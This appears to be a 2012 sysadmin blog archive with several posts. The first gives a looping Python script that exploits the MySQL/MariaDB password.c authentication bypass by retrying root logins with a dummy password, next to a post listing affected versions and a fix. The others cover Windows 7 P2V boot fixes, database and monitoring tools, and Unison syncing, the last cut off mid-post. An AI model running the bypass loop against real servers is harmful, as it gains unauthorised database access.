Posts

Showing posts from June, 2012

Python Script to Test MySQL password.c hack

vi /root/MySQLByPass.py
==========
#!/usr/bin/python
import subprocess

while 1:
subprocess.Popen("mysql -u root mysql --password=xx",shell=True).wait()
==========
python /root/MySQLByPass.py

Security vulnerability in MySQL/MariaDB

A vulnerability has been identified in Mysql and MariaDB.

Basically under specific conditions it is possible for an attacker to provide any password and it will be accepted.

The source file affected is password.c

you can find an more detailed explaination and a fix here

http://seclists.org/oss-sec/2012/q2/493

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

If you know a username (root in most cases).  A situation arises where if you connect approx 250 to 300 times, that mysql will allow you connect without any password.

Windows 7 P2V 0xc0000225 and 0x0000007b Error

This was a procedure I found on the web to resolve error 0xc0000225 and 0x0000007b when booting a virtual windows 7 system after performing a p2v


Mont the Win7 DVD in VMware Workstation using the removable media options or else change the bios setting in the VM so it will boot from an ISO image.At the first screen (Language Selection), hit Shift-F10 for a command prompt.Run Regedit.Highlight HKEY_LOCAL_MACHINELoad the system hive from the VM's disk, File > Load HiveSelect < c: > \Windows\System32\config\systemRegedit will ask for a Key name: Name it something like "asdf"Expand HKEY_LOCAL_MACHINE\asdf\ControlSet001\Services\intelideChange the data for value "Start" from "3" to "0".For each service listed below under HKLM/System/CurrentControlSet001/Services/ set the "Start" parameter to the corresponding value from the list below
Aliide = 3
Amdide =3
Atapi = 0
Cmdide = 3
iaStorV = 3
intelide = 0
msahci = 3
pciide = 3
viaide …

Chive May Replace phpmyadmin

Chive is a Web 2.0 front end for SQL database management.

http://www.chive-project.com/

Simple Windows Monitoring with PolyMon

PolyMon is an open source system monitoring solution that can be used to generate email alerts and analyze historical trends of monitor counters and monitor statuses.

It is based on the .NET 2.0 framework and SQL Server 2005.

The most recent version integrates with Visual Studio 2010

http://polymon.codeplex.com/

I write some software using VB.NET and C# and this is ideal as an add-on, where I can extend it to allow me monitor application specific logs.

Using Unison to Take MySQL Copy

Recently I needed to take a copy of a mysql database dump on a regular basis from a remote CentOS database server hosted in a data centre in the UK, on to a Windows Server based in Ireland also running a similar version of MySQL.

We require a copy of the data on an hourly basis

So I decided to try out unison to synchronize folders between a remote server and local server

Windows Server

Firstly download unison from this located at
http://www.cis.upenn.edu/~bcpierce/unison/download.html

When I downloaded the latest binary option for Windows you get two files, one is the text/command line tool and the other is an application based on gtk.

I took a copy of the command line application, created a folder called c:\unison an dropped my file in to that folder.You will also need to grab a copy of an ssh client that will run under windows. you can go with something like cygwin but I wanted something that was quick to install and had a small foot print so I selected

OpenSSH for Windows
http://sshwindo…